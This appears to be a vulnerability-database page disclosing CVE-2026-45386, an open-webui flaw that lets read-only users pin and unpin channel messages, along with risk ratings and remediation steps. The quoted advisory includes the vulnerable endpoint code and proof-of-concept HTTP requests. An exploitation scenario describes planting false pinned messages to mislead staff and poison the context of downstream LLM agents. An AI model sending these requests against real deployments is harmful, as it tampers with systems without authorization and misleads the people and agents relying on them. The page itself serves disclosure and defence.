CVE-2026-45386: open-webui: auth bypass lets read-only users pin messages
GHSA-5gc6-xhv4-2wg6 MEDIUM CISA: TRACK*Open-webui versions up to 0.9.4 contain an authorization logic flaw where the message pin/unpin API endpoint checks only 'read' permission instead of the required 'write' permission in standard channels, allowing any authenticated read-only user to modify pinned message state. While CVSS scores this at 4.3 medium with no confidentiality impact, organizations running open-webui as an internal LLM collaboration interface should note that this lets lower-privileged users silently disrupt curated channels — unpinning security advisories or pinning misleading content to manipulate what colleagues and downstream LLM agents see first. There is no active exploitation (not in KEV, no public PoC beyond the advisory proof-of-concept), but with 91 CVEs tracked in this package and a package risk score of 38/100, open-webui's vulnerability cadence warrants prompt action. Upgrade to open-webui 0.9.5 immediately; no effective workaround exists short of removing read-only channel memberships entirely.
What is the risk?
Low-medium operational risk. Exploitation requires an authenticated account with at minimum read access — anonymous exploitation is impossible. The integrity impact is bounded to message pinning state; no data is exfiltrated, no code executes, and no service is disrupted. CVSS 4.3 is an accurate score. Exploitability is trivial for any attacker holding valid credentials, requiring only a single HTTP POST request. Primary concern is insider threat or compromised read-only accounts being used to manipulate pinned announcements, security notices, or operational runbooks in LLM-backed team channels — especially if those channels feed downstream AI context.
How does the attack unfold?
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Open WebUI | pip | <= 0.9.4 | 0.9.5 |
Do you use Open WebUI? You're affected.
How severe is it?
What is the attack surface?
What should I do?
5 steps-
Upgrade open-webui to version 0.9.5 or later — this is the only complete fix.
-
Until patched, revoke read-only channel memberships from untrusted or external users in standard channels containing sensitive content.
-
Audit the AccessGrants table for all read-only principals with access to channels hosting security-critical or LLM-context-feeding content.
-
Review recent pin/unpin activity logs and cross-reference against user permission levels to detect any prior exploitation.
-
Establish a patch SLA for open-webui given its history of 91 tracked CVEs; treat it as a high-churn dependency requiring active monitoring.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-45386?
Open-webui versions up to 0.9.4 contain an authorization logic flaw where the message pin/unpin API endpoint checks only 'read' permission instead of the required 'write' permission in standard channels, allowing any authenticated read-only user to modify pinned message state. While CVSS scores this at 4.3 medium with no confidentiality impact, organizations running open-webui as an internal LLM collaboration interface should note that this lets lower-privileged users silently disrupt curated channels — unpinning security advisories or pinning misleading content to manipulate what colleagues and downstream LLM agents see first. There is no active exploitation (not in KEV, no public PoC beyond the advisory proof-of-concept), but with 91 CVEs tracked in this package and a package risk score of 38/100, open-webui's vulnerability cadence warrants prompt action. Upgrade to open-webui 0.9.5 immediately; no effective workaround exists short of removing read-only channel memberships entirely.
Is CVE-2026-45386 actively exploited?
No confirmed active exploitation of CVE-2026-45386 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-45386?
1. Upgrade open-webui to version 0.9.5 or later — this is the only complete fix. 2. Until patched, revoke read-only channel memberships from untrusted or external users in standard channels containing sensitive content. 3. Audit the AccessGrants table for all read-only principals with access to channels hosting security-critical or LLM-context-feeding content. 4. Review recent pin/unpin activity logs and cross-reference against user permission levels to detect any prior exploitation. 5. Establish a patch SLA for open-webui given its history of 91 tracked CVEs; treat it as a high-churn dependency requiring active monitoring.
What systems are affected by CVE-2026-45386?
This vulnerability affects the following AI/ML architecture patterns: LLM chat interfaces, Agent frameworks using open-webui as frontend, RAG pipelines ingesting channel content.
What is the CVSS score for CVE-2026-45386?
CVE-2026-45386 has a CVSS v3.1 base score of 4.3 (MEDIUM). The EPSS exploitation probability is 0.20%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0012 Valid Accounts AML.T0048.001 Reputational Harm AML.T0049 Exploit Public-Facing Application Compliance Controls Affected
What are the technical details?
Original Advisory
### Summary `Pin/Unpin` is a write operation (modifies the message's `is_pinned `, `pinned_by`, `pinned_at` fields), but in standard channels it only checks `read` permission, allowing users with read-only access to pin/unpin any message. ### Details https://github.com/open-webui/open-webui/blob/9bd84258d09eefe7bf975878fb0e31a5dadfe0f8/backend/open_webui/routers/channels.py#L1218 ``` @router.post('/{id}/messages/{message_id}/pin', response_model=Optional[MessageUserResponse]) async def pin_channel_message( request: Request, id: str, message_id: str, form_data: PinMessageForm, user=Depends(get_verified_user), db: Session = Depends(get_session), ): check_channels_access(request) channel = Channels.get_channel_by_id(id, db=db) if not channel: raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=ERROR_MESSAGES.NOT_FOUND) if channel.type in ['group', 'dm']: if not Channels.is_user_channel_member(channel.id, user.id, db=db): raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=ERROR_MESSAGES.DEFAULT()) else: if user.role != 'admin' and not channel_has_access(user.id, channel, permission='read', db=db): raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=ERROR_MESSAGES.DEFAULT()) ``` The `channel_has_access` function https://github.com/open-webui/open-webui/blob/9bd84258d09eefe7bf975878fb0e31a5dadfe0f8/backend/open_webui/routers/channels.py#L75 checks user permissions against the `AccessGrants` table: ``` def channel_has_access( user_id: str, channel: ChannelModel, permission: str = 'read', # 'read' or 'write' strict: bool = True, db: Optional[Session] = None, ) -> bool: if AccessGrants.has_access( user_id=user_id, resource_type='channel', resource_id=channel.id, permission=permission, db=db, ): return True # ... ``` The `AccessGrant` table distinguishes between `read` and `write` permission levels. ### PoC `admin` creates Standard Channel with Read-Only Access for `test1` : ``` POST /api/v1/channels/create Authorization: Content-Type: application/json { "name": "pin-test-standard", "access_grants": [ { "principal_type": "user", "principal_id": "cfc3cb19-9e92-4bf7-8b72-1b47fe4ff62c", "permission": "read" } ] } ``` `admin` posts a Message in the Channel, and `test1` has `read` permission only. <img width="1024" height="423" alt="image" src="https://github.com/user-attachments/assets/e9912bd7-3908-44f2-8984-22d0535dc66f" /> `test1` attempts to Pin Message: ``` POST /api/v1/channels/0699b656-578f-4976-94b0-65e2b19752fd/messages/4797359b-aad5-4081-9617-e8ca58524a87/pin Authorization: Bearer <test1_token> Content-Type: application/json { "is_pinned": true } ``` ``` { "id": "4797359b-aad5-4081-9617-e8ca58524a87", "user_id": "28c859b7-84e2-4217-b4d7-3f0e43f7c4b9", "is_pinned": true, "pinned_by": "cfc3cb19-9e92-4bf7-8b72-1b47fe4ff62c", "pinned_at": 1774716314908288719, "content": "Admin announcement in standard channel - test1 should NOT be able to pin this" } ``` Successfully pinned admin's message. `pinned_by` records test1's user ID. <img width="1024" height="350" alt="image" src="https://github.com/user-attachments/assets/705b1f45-95a9-4e91-8a74-10bdbccde0b8" /> `test1` (Read-Only) can alse Unpin Message. The Pin/Unpin endpoint in standard channels only checks `read` permission, allowing read-only users to pin/unpin any message. ### Impact Read-only users can pin irrelevant messages, disrupting important information display in the channel . ### Recommended Fix Change the Pin endpoint's permission check from `read` to `write` .
Exploitation Scenario
An attacker granted read-only access to an internal open-webui channel — for example, a contractor account or a lateral-movement pivot using a compromised low-privilege credential — sends a crafted POST to '/api/v1/channels/{channel_id}/messages/{message_id}/pin' with their bearer token and payload {"is_pinned": true}. The endpoint validates only read permission, which the attacker holds, and succeeds. The attacker unpins a legitimate security advisory pinned by an administrator, then pins a fabricated message such as 'No active incidents — system healthy' to manipulate the information visible to channel members. If the channel feeds an LLM agent via context injection or RAG, the poisoned pinned content may influence AI-generated summaries, incident triage decisions, or automated responses.
Weaknesses (CWE)
CWE-639 — Authorization Bypass Through User-Controlled Key: The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data.
- [Architecture and Design] For each and every data access, ensure that the user has sufficient privilege to access the record that is being requested.
- [Architecture and Design, Implementation] Make sure that the key that is used in the lookup of a specific user's record is not controllable externally by the user or that any tampering can be detected.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N References
Timeline
Related Vulnerabilities
CVE-2026-44551 9.1 open-webui: LDAP auth bypass — full account takeover
Same package: open-webui CVE-2026-45672 8.8 open-webui: code exec gate bypass via API endpoint
Same package: open-webui CVE-2026-44552 8.7 open-webui: Redis cache poisoning enables cross-instance tool hijack
Same package: open-webui CVE-2025-64495 8.7 Open WebUI: XSS-to-RCE via malicious prompt injection
Same package: open-webui CVE-2026-45315 8.7 open-webui: stored XSS → JWT theft and admin takeover
Same package: open-webui